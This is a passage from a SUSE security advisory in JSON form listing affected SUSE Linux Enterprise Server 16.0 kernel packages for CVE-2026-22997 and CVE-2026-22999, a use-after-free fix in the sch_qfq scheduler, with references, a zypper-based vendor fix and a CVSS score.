"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22997"
},
{
"cve": "CVE-2026-22999",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22999"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: do not free existing class in qfq_change_class()\n\nFixes qfq_change_class() error case.\n\ncl-\u003eqdisc and cl should only be freed if a new class and qdisc\nwere allocated, or we risk various UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22999",
"url": "https://www.suse.com/security/cve/CVE-2026-22999"
},
{
"category": "external",
"summary": "SUSE Bug 1257236 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "external",
"summary": "SUSE Bug 1257238 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257238"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
